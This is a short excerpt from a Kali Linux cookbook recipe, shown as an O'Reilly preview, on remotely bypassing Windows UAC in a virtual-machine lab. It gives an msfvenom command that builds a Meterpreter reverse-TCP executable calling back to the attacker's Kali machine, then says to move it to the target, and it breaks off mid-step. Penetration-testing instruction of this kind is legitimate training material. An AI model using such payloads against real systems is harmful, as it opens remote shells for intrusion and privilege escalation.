How to do it...

We will remotely bypass Windows UAC to elevate privileges:

  1. Validate the IP addresses of your Kali VM and your Windows VM – you should have interfaces on both of your host-only networks on both boxes. In my case, my Kali device is 192.168.56.10 and my Windows XP device is 192.168.56.102.
  2. Open a terminal window by clicking the terminal icon: 
  3. We will quickly create a payload file with msfvenom by typing the following command:
msfvenom -p Windows/meterpreter/reverse_tcp lhost=192.168.56.10 lport=8443 -f exe > /root/exploit.exe 
Kali: Terminal output
  1. Once the payload is created, move it to your target machine.
  1. Log in to your ...

Get Kali Linux Cookbook - Second Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.